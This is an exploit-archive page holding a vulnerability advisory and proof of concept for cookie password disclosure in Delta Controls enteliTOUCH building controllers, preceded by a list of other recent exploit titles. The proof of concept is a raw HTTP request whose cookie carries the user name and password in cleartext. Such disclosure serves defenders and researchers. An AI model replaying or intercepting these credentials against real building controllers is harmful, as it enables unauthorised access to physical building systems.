
21 changes to exploits/shellcodes Microsoft Exchange Mailbox Assistants 15.0.847.40 - 'Service MSExchangeMailboxAssistants' Unquoted Service Path Microsoft Exchange Active Directory Topology 15.0.847.40 - 'Service MSExchangeADTopology' Unquoted Service Path 7-zip - Code Execution / Local Privilege Escalation PTPublisher v2.3.4 - Unquoted Service Path EaseUS Data Recovery - 'ensserver.exe' Unquoted Service Path Zyxel NWA-1100-NH - Command Injection ManageEngine ADSelfService Plus 6.1 - User Enumeration Verizon 4G LTE Network Extender - Weak Credentials Algorithm Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF) Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Scripting (XSS) Delta Controls enteliTOUCH 3.40.3935 - Cookie User Password Disclosure Scriptcase 9.7 - Remote Code Execution (RCE) WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - SQL Injection Easy Appointments 1.4.2 - Information Disclosure WordPress Plugin Videos sync PDF 1.7.4 - Stored Cross Site Scripting (XSS) WordPress Plugin Popup Maker 1.16.5 - Stored Cross-Site Scripting (Authenticated) REDCap 11.3.9 - Stored Cross Site Scripting PKP Open Journals System 3.3 - Cross-Site Scripting (XSS) WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated) Fuel CMS 1.5.0 - Cross-Site Request Forgery (CSRF)
48 lines
No EOL
2 KiB
Text
48 lines
No EOL
2 KiB
Text
Exploit Title: Delta Controls enteliTOUCH 3.40.3935 - Cookie User Password Disclosure
|
|
Exploit Author: LiquidWorm
|
|
|
|
|
|
Vendor: Delta Controls Inc.
|
|
Product web page: https://www.deltacontrols.com
|
|
Affected version: 3.40.3935
|
|
3.40.3706
|
|
3.33.4005
|
|
|
|
Summary: enteliTOUCH - Touchscreen Building Controller. Get instant
|
|
access to the heart of your BAS. The enteliTOUCH has a 7-inch,
|
|
high-resolution display that serves as an interface to your building.
|
|
Use it as your primary interface for smaller facilities or as an
|
|
on-the-spot access point for larger systems. The intuitive,
|
|
easy-to-navigate interface gives instant access to manage your BAS.
|
|
|
|
Desc: The application suffers from a cleartext transmission/storage
|
|
of sensitive information in a Cookie. This allows a remote
|
|
attacker to intercept the HTTP Cookie authentication credentials
|
|
through a man-in-the-middle attack.
|
|
|
|
Tested on: DELTA enteliTOUCH
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2022-5704
|
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5704.php
|
|
|
|
|
|
06.04.2022
|
|
|
|
--
|
|
|
|
|
|
GET /deltaweb/hmi_useredit.asp?ObjRef=BAC.1000.ZSL3&formAction=Edit HTTP/1.1
|
|
Host: 192.168.0.210
|
|
Cache-Control: max-age=0
|
|
User-Agent: Toucher/1.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
|
Referer: http://192.168.0.210/deltaweb/hmi_userconfig.asp
|
|
Accept-Encoding: gzip, deflate
|
|
Accept-Language: en-US,en;q=0.9
|
|
Cookie: Previous=; lastLoaded=; LastUser=DELTA; LogoutTime=10; UserInstance=1; UserName=DELTA; Password=LOGIN; LastGraphic=; LastObjRef=; AccessKey=DADGGEOFNILEJMBBCNDKFNJPHPPJDAEDGEBJACPEAPBHDCGPCAGNNDEOJIJEOPPLOEKCFMAFNHDJPHGACMDFMPFDNONPIJAHBBNAAIDMDHCCPMAJDELDNLOPBPDCKELJADDKICPMMPCNEOMBHMKIIBJHFAJKNKJFGDEOLPMGMNBEHFLNEDIFMJKMCJKBHPGGEMHJJGMOMAECDKDIIKGNDDGANIHDKPNACLMANGJAOBDNJCFGEIHIJICLPGOFFMDOOLOJCJPAPPKOJFCKFAHDDAGNLCAHKKKGHCBODHBNDCOECGHG
|
|
Connection: close |